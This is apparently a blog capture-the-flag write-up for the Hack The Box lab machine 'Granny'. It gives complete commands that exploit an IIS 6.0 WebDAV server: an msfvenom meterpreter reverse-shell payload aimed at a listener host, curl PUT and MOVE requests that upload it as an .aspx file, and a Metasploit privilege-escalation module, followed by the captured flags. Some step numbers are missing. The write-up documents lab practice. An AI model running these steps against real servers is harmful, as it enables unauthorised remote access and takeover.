GRANNY 10.10.10.15 Write Up
Machine Created by ch4p
Tools Used for Enumeration:
1. nmap2. davtest
Tools Used for Exploitation:
1. metasploitSteps for primary enumeration:
1. At first we use nmap (Network Mapping tool) to scan the box ip. When we run it we got list of some open ports and services running on those ports. On the granny box we can see, open port and service is, port 80 for Microsoft IIS httpd 6.0.Command used: nmap -A 10.10.10.15
2. Opening the site in browser, it shows a default under construction IIS page (webDAV).
Steps to get user.txt:
1. nmap scan showed that put method is allowed in webdav.
3. We can create a metsploit reverse shell payload to upload with command "msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.21 LPORT=1337 -f aspx > zishan.aspx". Then we can upload the file with command "curl -X PUT http://10.10.10.15/zishan.txt --data-binary @zishan.aspx". Then move the text file to executable with command "curl -X MOVE -H 'Destination: https://10.10.10.15/zishan.aspx' https://10.10.10.15/zishan.txt".
4. Now we can listen with metasploit module "exploit/multi/handler", proper lhost, proper lport and payload "windows/meterpreter/reverse_tcp". Opening uploaded shell with command "curl http://10.10.10.15/zishan.aspx" to get shell.
6. By testing a working module from suggestion we can get a system privileged shell to the machine. Module used: exploit/windows/local/ms14_058_track_popup_menu
7. Now we can get user.txt by using command "cat 'C:\Documents and Settings\Lakis\Desktop\user.txt'".
Steps to get root.txt:
1.We can get root hash by typing "cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'" command.
Flags:
1. user.txt flag: 700c5dc163014e22b3e408f8703f67d12. root.txt flag: aa4beed1c0584445ab463a6747bd06e9
No comments:
Post a Comment